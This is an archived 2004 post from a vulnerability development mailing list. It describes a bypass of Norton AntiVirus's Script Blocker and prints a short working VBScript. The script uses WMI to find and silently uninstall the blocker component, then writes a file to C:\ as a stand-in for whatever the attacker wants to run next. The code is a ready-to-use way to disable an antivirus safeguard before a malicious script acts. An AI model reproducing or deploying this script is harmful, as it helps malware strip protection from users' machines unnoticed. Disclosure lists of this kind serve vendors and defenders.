|
Vulnerability Development
mailing list archives
Norton Anti Virus Script Blocker bypass using script(vb,js,...) II
From: <vozzie () gmail com>
Date: 16 Jul 2004 05:09:14 -0000
what i forgot to say in previous post,...
if you start the script with killing Norton AV it's Script Blocker, then Script Blocker will not warn anymore when
script is about to use 'dangerous' objects,...
' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
' uninstall script blocker part of norton
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next
' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"
norton will still work, only the script blocker will appear dead in the window,....
By Date
By Thread
Current thread:
- Norton Anti Virus Script Blocker bypass using script(vb,js,...) II vozzie (Jul 16)
|